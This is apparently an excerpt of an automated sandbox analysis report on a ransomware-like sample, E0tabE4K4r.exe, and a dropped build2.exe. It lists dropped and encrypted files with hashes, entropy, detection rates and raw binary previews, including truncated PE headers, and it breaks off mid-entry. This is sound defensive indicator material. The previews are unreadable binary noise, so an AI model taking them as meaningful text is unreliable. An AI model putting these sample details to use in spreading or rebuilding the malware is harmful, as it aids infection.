                                                                                                                                                  SHA-512:63BA92C49F9B8C65D607AF9CDB76687F4129866C48C00C847ED22F632FA8425BB278AB11895C7CE50EF4EED08E2D96BC09F485AA89B30E158532832D02DF39E5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:*...#.@..94t.;...r.k..T....]...S.....o...[...?-_..:.\8......m.......!.e.......=.r....z6.(...P...EOIo..-I..S../G.d4.S..Sk]...l. .e.!bC..!.MMhh....X...T.x<@...k.J.=.gO..E.......G(..0..C..Y.R....|.8a...,.[..S...S..7V...n.+..)'.,-...Ful...%9.z.8.R..X...]^.'....F..T...x.7.K...P..Cj).C-..cmLcMqDB...M....3`i.OxU.Q...^N...;...I"............KO...j....#....X.M@.....gbA...Fp&.>.A...(.Xs...N..R...,+WW'......F..CT.(.:....[......%&......``..............&.....aM....9........A ....f..k8.z.....}d.Gs*....x.WfV..0..wn..P.G...._Njo.....g`..f5...x..R0...oA~...(.........H.?':r..9..'..8..En..)...I[..od.N....Xs..(-.%.=..'.X:-g=.q.{......(..$. .............I../..;..SQ^j){BqH...k.h..U..?.e~..0....^GA..)P..|.L...D..M..~.....0#.)..W.d.`.P...^". ..;......'Y..N5...:2.0..D.c.D..G./.....r...5d8l*......5.[:.....fs.a..&.K...?.ofm%.}.."~..z]'.[V..Q..er{.......>................Y.>4........w.-.d.........'.~....YO..t........j..P.7....`..Y&.>.!Y"`._v..3..g..b8&[....1{{j

                                                                                                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):655
                                                                                                                                                  Entropy (8bit):7.685765065992201
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:kiY7+EHkaw/flkUSTtK3RTi3sbZOVhs6miuJXtN4+s2U4+MexSUdNcii9a:QlHo/mHTtK3RO+ehs6u9A2Uyd2bD
                                                                                                                                                  MD5:9868BC54CE8FF381EFAC9BD99C318A6E
                                                                                                                                                  SHA1:8F9D3D8384C72DA17ADE2A5363BD375962C7FFB7
                                                                                                                                                  SHA-256:A315E6DFE12AEC9561C0C53789089174F49457D9CECE2668E270F89DEB50DCCD
                                                                                                                                                  SHA-512:B668545B219E439DC897A5E6C5B1E11D2D65325AF371A30ACD7F67336EBFA884D5A6ED64C3447FDA288FD15CA787B0221A58B2614550273CFE2198C399D2BFF7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:2023/.W..s.Y..DS....S...Ph...}...K..S.Y.(..E.#H...... ...t{#...fJ...c%,}.l..bHn .....t....A@;.-......N.TlO..q.v.y...6..EN....E...F...Y`....?.e......*3.....{.".N...C..b..E..z.R:3GW..)67~.%...F..B|....:.c.t.U..*..s.H/.._H...~..H...|.."..T.T.i........B.:...s...NfYC....|ED%>......U.A..G.o..F/^/...#0.V..}...`...m..Z..m.^.]......T.A..G..........I..'..5..=.<?y4...c.z..NJ.d...b....J..*..|.$....k?.<..U..t.*.e.V+..Y....e...<.v..X..)..$.....?....u.&:..;.....Nt2.dec....%.....t...w..*...........P...C..U..~.._s..-p8.k.t.......L.K......@..q.)LZ....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):655
                                                                                                                                                  Entropy (8bit):7.685765065992201
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:kiY7+EHkaw/flkUSTtK3RTi3sbZOVhs6miuJXtN4+s2U4+MexSUdNcii9a:QlHo/mHTtK3RO+ehs6u9A2Uyd2bD
                                                                                                                                                  MD5:9868BC54CE8FF381EFAC9BD99C318A6E
                                                                                                                                                  SHA1:8F9D3D8384C72DA17ADE2A5363BD375962C7FFB7
                                                                                                                                                  SHA-256:A315E6DFE12AEC9561C0C53789089174F49457D9CECE2668E270F89DEB50DCCD
                                                                                                                                                  SHA-512:B668545B219E439DC897A5E6C5B1E11D2D65325AF371A30ACD7F67336EBFA884D5A6ED64C3447FDA288FD15CA787B0221A58B2614550273CFE2198C399D2BFF7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:2023/.W..s.Y..DS....S...Ph...}...K..S.Y.(..E.#H...... ...t{#...fJ...c%,}.l..bHn .....t....A@;.-......N.TlO..q.v.y...6..EN....E...F...Y`....?.e......*3.....{.".N...C..b..E..z.R:3GW..)67~.%...F..B|....:.c.t.U..*..s.H/.._H...~..H...|.."..T.T.i........B.:...s...NfYC....|ED%>......U.A..G.o..F/^/...#0.V..}...`...m..Z..m.^.]......T.A..G..........I..'..5..=.<?y4...c.z..NJ.d...b....J..*..|.$....k?.<..U..t.*.e.V+..Y....e...<.v..X..)..$.....?....u.&:..;.....Nt2.dec....%.....t...w..*...........P...C..U..~.._s..-p8.k.t.......L.K......@..q.)LZ....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exe
                                                                                                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 66791 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):66791
                                                                                                                                                  Entropy (8bit):7.995531727155867
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:drFvD2YSE/sFDqV0FJJynkAhftCvMd3coa282frgW1qgNzU:drVDJSeaDqV0FJwLhVkr282fF5U
                                                                                                                                                  MD5:AC05D27423A85ADC1622C714F2CB6184
                                                                                                                                                  SHA1:B0FE2B1ABDDB97837EA0195BE70AB2FF14D43198
                                                                                                                                                  SHA-256:C6456E12E5E53287A547AF4103E0397CB9697E466CF75844312DC296D43D144D
                                                                                                                                                  SHA-512:6D0EF9050E41FBAE680E0E59DD0F90B6AC7FEA5579EF5708B69D5DA33A0ECE7E8B16574B58B17B64A34CC34A4FFC22B4A62C1ECE61F36C4A11A0665E0536B90D
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MSCF............,...................I.................gW.e .authroot.stl..u/1.5..CK..<Tk...p.k:..c.Y:.(Qc...%Y.f_...$..DHn..6i/.]....-!QQ*..}f..f...}..1....9.......pN..mI.a.....!...N.....xP.f6..C.'#.c.@GN(3.<3.......9...('3...l.l....B..x..e...UWFU.TT.l.L...._.l1......w.\..Xb.v..Q......pKP.....M`.Y......Op4=.(=P.e...p.(U.....z7MF..O......V2.....#...pj...z.!...wQ...V&.Gz..Nv.4..y(J...A..':.2Q.^u.y..<.1..2..o........H.D.S.....62.| w(...B.......h.QZ..'....l.<....6..Z...p?... .pT.......l..S..K....FT?.....p..`.&..y..."T=l.n..egf.w..X.Y...G.m....=.}cO.7.....9....o..:.Y=.-.5....ud.J&.]..*Q..._<.S....{a.=.n...PT.Um).| kpyA....h.PXY.>.......^2U...H.....V<\...k..~....H..p...8..'..?...r>.4..!u......1\.`.<.+..n..p..]...).....L.g....#.<..c]R.U."\i.Z.>...`Q..g6....0.......F.........N.s.Z..A........m.^....a_..>v.-.mk...wt.n.:...>S..;....1...j.+m.&S......$.T...i.B=h.n...c.!e.....Y.#..bw.}...d.. ..w... .&..w.9..}k...\...=....{q.Up..y;..7.-.K.'.....

                                                                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):330
                                                                                                                                                  Entropy (8bit):3.130858325867485
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:kKNasurN+SkQlPlEGYRMY9z+4KlDA3RUeWc3l0:1hPkPlE99SNxAhUeWcC
                                                                                                                                                  MD5:4FDA638251848B59C7A3C37E3825B41B
                                                                                                                                                  SHA1:E5C674E3125312FCC516967509B5F79F4B436D7B
                                                                                                                                                  SHA-256:6A41CB8AE09F6B42DC689CE3171A11264D7831433950D41E449EFE4FF9A3D008
                                                                                                                                                  SHA-512:666A3AA0EFD035BD76A263F1D1C544B6986B9DDF60E1168625BE91CA33A1EB95EBF718ACDC56ED8BF01B020D4EF03A2D0F0D6330AFC016BDC60158AEE2FF138E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:p...... ..........g..D..(....................................................... ..........H"......(...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".3.f.e.4.e.6.1.a.4.8.2.2.d.a.1.:.0."...

                                                                                                                                                  C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):838656
                                                                                                                                                  Entropy (8bit):7.7593539524615975
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:Danoo9lgJSVadwqRPFOwbl3JeknVz4SZSVXYcXywbp:DablggMWHknVz57c
                                                                                                                                                  MD5:9DE69C7A3E551DCBC9208221099680A7
                                                                                                                                                  SHA1:E5AE2554407774C2CBBDDE1C1DCA1B15D51B6D20
                                                                                                                                                  SHA-256:9A880D7572486DD985ED6FFBF55EEE8875077D9614BEFC12D5FBDAAFD45E86D5
                                                                                                                                                  SHA-512:D5BD138D9CAF008504B9EE9E2186E38CD1DF05F6FBF2DCF0E26CA7BB63F7BE8BC87FEBFF4082AD29BAD5BCFB3C4E91A715942152D5F8B101677111B904AB8630
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 89%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............................(...........................Rich...........................PE..L...{.xd.................:..........M........P....@..........................P..............................................\z..<........1...........................................................r..@............P...............................text....9.......:.................. ..`.rdata...5...P...6...>..............@..@.data....e.......$...t..............@....puyihi.............................@....rsrc....1.......2..................@..@........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe:Zone.Identifier

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:modified
                                                                                                                                                  Size (bytes):26
                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                  C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):367104
                                                                                                                                                  Entropy (8bit):6.976668751990096
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:pfLgtyckjU51Vc7lLUvTlR2agQAYNMQSnjbeg:pfMtycGU5/klLUvTlR5Aiuv
                                                                                                                                                  MD5:C4070DA9F9B0581171AF16E681CCDFF8
                                                                                                                                                  SHA1:3FB4182921FDC3ACD7873EBE113AC5522585312A
                                                                                                                                                  SHA-256:26063C78E5418610471A9F3A00A155D7D1E5B29856E1979BA3BDC42681A871D0
                                                                                                                                                  SHA-512:C7569CEA7F1A841E7CAC9CD41287DBA3BCACF2CF9DEE7BECE88800848A7AD5DC4CD2BDC896C7389F0F1144079BBE168048B3F722BCD76FA5D6E14F3081BB6427
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                  • Filename: sbvN2ih5AU.exe, Detection: malicious, Browse
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`...$...$...$...:...5...:...v...:........A..'...$...x...:...%...:...%...:...%...Rich$...........................PE..L......d............................."....... ....@.................................W}......................................\U..(............................................................H......XH..@............ ..t............................text...y........................... ..`.rdata...=... ...>..................@..@.data...|....`.......P..............@....tls................................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:PostScript document text
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1567
                                                                                                                                                  Entropy (8bit):7.8753750322645795
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:AWkTgjET1JSrqr/uFzXrqrKghw7+EJliQEpfPRjiWYcjoBCEo2bD:FkTBWrNFOBIlnC2cjofD
                                                                                                                                                  MD5:8441AC890C8BAED25574872D239B5123
                                                                                                                                                  SHA1:E0086826258A30CF0959ABAD7167770C95738A3A
                                                                                                                                                  SHA-256:495708C8E75A433E38783CFBB3B8A959AB7D2D0152F5E8598ABC2312C77FB7E6
                                                                                                                                                  SHA-512:07650A21A8D5D65DB5F3AA3A006AD0EA956991206A9CBE833C950B2811A27E17B065965514CCFE6797EDF6553FAD78A91C185C8A587043C094B16CE29E3C019C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:%!Ado-.C)....f..l.01;I.%.1;..S...p.....]y+uq.y0X...*.*/|.E+..B.........Vtl.+p...v......Y.......2...q...%.K={...FP....Bm#..2......7..........zRs(....rs5j..../....2d.w^.d.v.H.c.......y..X.,m&.?z":....>...v..z.S.y._i.:h..u`...Ms?.,........n..XE.0.!.E7L9>.K.R#C.t9.......0.0.;.`p.*.o+~=.3U?.o@X..m.#j.>..."..+5.\w.hj'...p.......r<.(......;.F..].....(1...&..:9.n3.Y1Zy.|.%...s.a..-...0..lL...R...kX3^F 6..kmI.g...$.f..P..$...n0.....%...^.,#...b.2s.>..f;.K:......fQ.HR.F.f..2.P..;Zv-r.I....5\.o.O............?.+ ..........R.u.&.../.&.%...JD....W..h..*...^...tc..'5.@....#.O.X..vu..z.5..b(.....S].A..Y-......bJn..k.)...`.E;2.z..[..*..N!}+..X........ny....0...8.h..m%.LW.|#W~.......6D.$..R......(O.]_..%.E...^.....9s.Mv<b........C.>$.FbzV.H..Y.6......I..BV...yM...s6X.7e.T]...8...rx...v..Q.n.5I....M..\.~...R.\d.].W....c..&..H..k.8@..;|@.[.ks......r~..8l...:..n...^d....G..*..D..<.4.oe..Nz.......vc.aJ.v[o...Tw.9.3....j>."l)2.4..fp....0c.>..........Z.B...CR

                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:PostScript document text
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):185433
                                                                                                                                                  Entropy (8bit):7.8766583246756365
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:uP//NlWRO2ktFn3Hyy+w2mBXrMBQ7djTyEgzi5K+RcVVyoyEe6JBG4wXE07ZmanK:uPHSs2s3HU5uNyEgzEoD8HXE07Zmandg
                                                                                                                                                  MD5:714F404B01DFEF2779C6B959E6587035
                                                                                                                                                  SHA1:E6679DDE11AC54FCA1AAD772A0CDD3195AF0C70E
                                                                                                                                                  SHA-256:AE0E00974A9F91ACCEDF7AE4E5ABAB1CE782F89C15DD7F51800FAD0FD969C397
                                                                                                                                                  SHA-512:0605266C30845A1CF83CECF38ED4D6A6207A0A19AD1E80234D54ACBB0844FBCCC188E1C819A56F9660BEE9317FE0FF865E814A43625B75B299504AD5AA3CE6FA
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:%!Ado,......H..-...J..i?F..y.....9..yC5.w%g=...2 ...t)..n....Z...........M.F..J.....0c......B.....*..'"..W..mQ.j...............@..`4=4..v..K]..... ..S.f_.........j'.:96.VR.:J...q..$4c.#.$..T.J.F...QH5.lX.6.uo......26.f3t.TIu...t..=.:X.+..iUI..#.Yt@....(.:...c.A....6..C..Jw.4..4.89@......Z.k.....;t.du].[9w.E.(.xC....|...EB.n.9...!.........I.;..=..5...E.r.U...#6.P)>.a...W.<t....E..,.!..;.R8..z................D.v.3L...-E..#.EN!..jf.....,...l|dia.=....l.(%...H.....P......B...R.....V-.wg.."......."..,...".......V90`.'.g(".l.6..5...:.0t.%J)$..G..NC+..H..o6p2.=..GP.I$h.......H.....d..]=?E,.R.f..m[..<..6.....9.mH..f|;.w.-...X.!%.9.o.'...jRL.........#S...a.M.......-...s.c.....{Ho.]..[.H.<.....2.#......Kq..gi.)3B.3CG.......w..Oa.l...$.;.<....O..LE...}.p...a.....(I..l.w../N%{.x.......~..oW.....oV....."$T..M.Wj0..".........>k..l..,b.&...-6.k.4.gB.^$}P.......Bd.'M.6......-&...]6E^.~k:....av....m....A.......k/...1.w..N.he.l......R..0.....y.).p./a

                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheAcro65536.dat

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):206549
                                                                                                                                                  Entropy (8bit):7.250273197825296
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:xPwNNQkrTMUi/8xtFDubVHdQsGVlu25nT:GyuiExnubdzGVkW
                                                                                                                                                  MD5:BD764EA708A6A3E2D227399F45DDF47F
                                                                                                                                                  SHA1:B6A0C94350C53E0F7786469D24542C11C3927AA5
                                                                                                                                                  SHA-256:70DF6DDF8D5ECA03E9D62BE7CD65D8FCB78B6C348A5A410F6779002E1DBD723F
                                                                                                                                                  SHA-512:5E3C7E0F043C6048C122EF07418D9975C93709A72AA238FAE08DA25BF1EABB4F5957EA2153BF6F9FA815DBE283E5FB773B452552484B668F601B7637DC512CD3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:Adobe.. w+s{...^E...P?....`...'.!..H.....+...A.......w.#c^.R....2.8.]'..D....W..".*...|....n..&..W...T.U.e.....WrI.....s....0ih!7.z.-....b..5....]..`..7*{....-..,....:.....d.T._.....v....tNA.&q....."..."w.$2B......2Y.o.,....b..|..].!g..0..s.N.5.-.K....T{...*.)U<.....e..*@>E..y..e+.0..&O....$t.\h.S.9.c..|......*._...J;.k&)...V...}y..lb.E....;.2.$.@..........M@.F.w...HV...M.@.~m...;;..=c4"`G.....H|J.l...BM.....cAEb....G!.J.+R.E4P..<!d.=.....6e.>.]..o....Z.&g..;.e....da.3 c.._........ ..m.T..z........._.X.9......~Q.;.A'.%Mh....F..I.(.@.....c.@.aCv...s)T.Y....t...Q`..C...g?>.s..~k......!.S.x....V..5..6m.;w^...(.6A..Np.(<:......"...:.>ri.....Qo..B.|<`G.)N.D........'$.TN..lN.|7.Ji......v.yF_).;....x.[..s(.........._.k.5.7..7.]...,).;p...l.WQ..!....+....oz.....A._P.XcQ.......Q...F.&.z..Q......bJ.3.L.........Q....O...b..k...HO.6s_;.x>?.....-t......X].EB0.F.G[m#...........Oi,.....h.|."2pV#..2...P.).K...?^...>(..<.pa...w......5.`.sK..

                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3152
                                                                                                                                                  Entropy (8bit):7.933508582089492
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:YHVLnNjOC5vZgNyIDDs9QOcPpxegumpeyMFGhrV/9uaLIScF8xlw7D:IJuyMDs9QfX5wpFg/DR5e3
                                                                                                                                                  MD5:F9C11CECDB3E197B834E8F26B55B58E6
                                                                                                                                                  SHA1:D444A0E57999C0DAD7F26846D6D0F38ADADF960E
                                                                                                                                                  SHA-256:49D6E7D82977F9909030BFAA4430011B2DE4A8F6C6C764CFA4B79CA6EBC3DCAE
                                                                                                                                                  SHA-512:F41C58EA28775EB30B64B5087B31EC8D844BAB1A1DCA99911C3E671A7FA894EA69149D4B8C81305A6FCA674E09E2423C0B77FB203BAAB43D946FB181F8F79A8C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{"allE.......V..[RL..4...j..8.4.}...@.H..|yK9..^..46....!..U..c....!......KQV....VG.q.j.mvh(..G.U...C.z.c"e...uk*`....xUDYp...*.P.....2......E.0..}.!..!N#..{....E.~&.vI.r.-C..~ D..h...?.p.v.SJ........n..mspY;.r.$..kN.01..0.....+..p3d(...i.c;n...S..x...[0.z....xNv..j.l.........'..Z. 1...8g...W..x...m./Se..Rt<...Nu.s."D"...'g|oH!....S..-.T....U[.../'?.....k+.1J...S..p..`GU.^... T..}.dfy.......O.iR......f....2..@H..c.....>...U.......Fx..-o.m.j=.E...2.$....w...}K...?.".4.|u..f....0alK.t.,b..'I..3().@..K...Z........C.y.4,...B...>=.p.s....|..5.MahCf...|.e..O)bwZg.....r2,.h./.W.\.PG....>.aD..V.X..U...B..+..)x.o.mY.=N.#....}..0.......m....W_......[..6.zM.n-|..B).d.Z~.t._5a..G<..o..@vNK?.....,..2..S..9.s.oe.1'..4.........b..r-.{t.....AU._9.+.H.j.T.d..S......M._..^.3....8...[...p.q..k.}.W/U.,ct.OO..C...pW!.]...MQW...G......<....C._..3...Ez.......C...&.=uG2g....%.......P..y...Q++..F..{....Q.).._t...D(udj....,...F...7iR....l...x..b....3.<ehP.q.j...uFo.W.1

                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):67060
                                                                                                                                                  Entropy (8bit):7.997541287202827
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:0sW+JYqqaDBvaoMQOEiyxwaGb3J9Bx5nLriTRuSY6Voj:0RaDBvaoMsi+VmJbxZLmTm6Voj
                                                                                                                                                  MD5:F6699931CFD688C6380CA3ECA9ADB87A
                                                                                                                                                  SHA1:064C726E7D9273A3296A3BF8B567D079917151D3
                                                                                                                                                  SHA-256:5119CA2CBB122C0DB41CAFE4C7409D540EDC9FDBB02BAFCDAD91669BA4C7EB53
                                                                                                                                                  SHA-512:7AD6803CCB2622362926ADDD0CD0B0EB5858E8E90372A0968ED73149457351BA8FBFD6FBF8A7EC73A4813E77839BF0B3F105A23B4F0B1F8F6728C302347FC144
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:4.397w...U..R..EC...f.;~...P..m.L...!...M47.H.....A....R.o.OX..y.......}..b..(v.b8....qE..&..R..Y.SZ..{..9...cj>...z`.U..`.8..J.@...s"......N......%C0D...T....|..l...mq.U.....`.\v..^...1.-U{..5.CQ......Ua?...3I......k....K.......e.xL....r.) .;.....UB.U....}@.."..h..zr$,...*.!..C....~.K.^.j+..........5....~.)..:.+.......(..TD........u.D..%H....|..j.......d\.O.~#M.A}..g]m..:x..+.6.....-...QTo..T......i.....}d$.bz.i.._;1.?..@.........GC@o".?y..m..^h$4..e.f2=....@.......?....y..a)..4&>N.w. a.i5.~....X.h...) Qv+&3.W+qE6.Bc .l.EY....>..p.%..#0.{N..B..Bj......'..{6...(.=..m.<...M*m~ l.q_L0C1..b....~m.%..N...Q.KG.,.....n..B..&..r..l...[n.~oj..{.x*.%y5.?.....$G..Pw....m..&...-..k.D.@W.Z...h-0..1.1{..,..y.b...rLw]:.$..[xV.%.._..0J...f...[?.e..L.:.....t...3G..mAZ.q..H....&....<..G).#........6..7T f.\B.V.T$D.@....O..y...Y.E....c.......kYH.]>'..?Myp....\....q..........l...T.b..#O}Pf....}......xu......X..'.P.......@..~...a.....@..r.T..|..j.b......G[.

                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Color\ACECache11.lst

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):932
                                                                                                                                                  Entropy (8bit):7.756791437450642
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:QiGeW19EbLo/hAUXz9486vMgJNsTGOsp2XhepHd98KRRB+2bD:JW/Egqez94Mg4KOU2ReXmkzlD
                                                                                                                                                  MD5:98B570EFE4ECD9CF53CBC7123654BDB9
                                                                                                                                                  SHA1:1F398550ECD877B1F2865A3842C6A5F15C7C3B6C
                                                                                                                                                  SHA-256:7F362B95295EB279236FDF3CD13397467DF2AC6B5B3A450526EEF6D8CE5A2EE0
                                                                                                                                                  SHA-512:CF517CD867E43618FD8829486465ACD82AAABD31676D07D5F18B0D994F2155B6A4A09F0ABA55979E6A554AED46092320EC62B917E530375D13042C38BE175BB4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:CPSA....0...?.v$.F.....-.%......){.+..._..bw.....{.T..x.#.t._&..hm.[..e.Zw.i....`A.1.0Wi\....a..^...S.,.....:Y..[\./Q....%..t...,n....D.lF.. .Rj.....:q.[......U@....Ix....}.3.'....O..f.....4.d...$SO. ..\.R.m..(p.R.*.j...m.*..2'...P.,...H.N...Y./.".g.Zu.F])....-M.x.;..&(B....K....B...V.. .M.A.u..Jt..0........3y._.z....F"...-...}&....o.)..)F..1..h..].b..:,.....b.*...W.>...!...*.:6..Y..Iio.XaX..........i..^.._#....w=;x>.W.J...K}....;.+./..~.....R+|...2x.^.....K.....7.//.0.2..l.j..$...0..'3..Z.u.:hz.>...R.....];..f.O>..w.......Uj[.P...o.D.......H0.dC`X..m....r..8.._F).....WpG)\.9.b....R.G.Tm..@..Att..V.~...)s...MG.GA..-4..1.V.....m.....A....k..H ?,..d...3.....6....E......."..../.Fz..%..6iQ.M./X...9.k0.=*....s.cm'....E.eI.#.C..m....S...,....sf..a|=.O..1/..A.)..Y......F.i.9:0.vz..2.I.A..)?L..[.....Az...X}O..N..$mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):8526
                                                                                                                                                  Entropy (8bit):7.974731078503766
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:8GwG8J+SFWEJmN/3OscZPcddgzJnuaut3zwRgeamo9J:GhJ+SFGd3BcZ0ddSm3zQkmeJ
                                                                                                                                                  MD5:0671FA46E763433A75AE29BF19D35F33
                                                                                                                                                  SHA1:517177FC4D4C3060CFEFC5B78034847E3FA54EB4
                                                                                                                                                  SHA-256:51839D457F25FAB0095FCBF3B6B3A1F38B8BDB0A2C1BA4218C194B5FF6D6A786
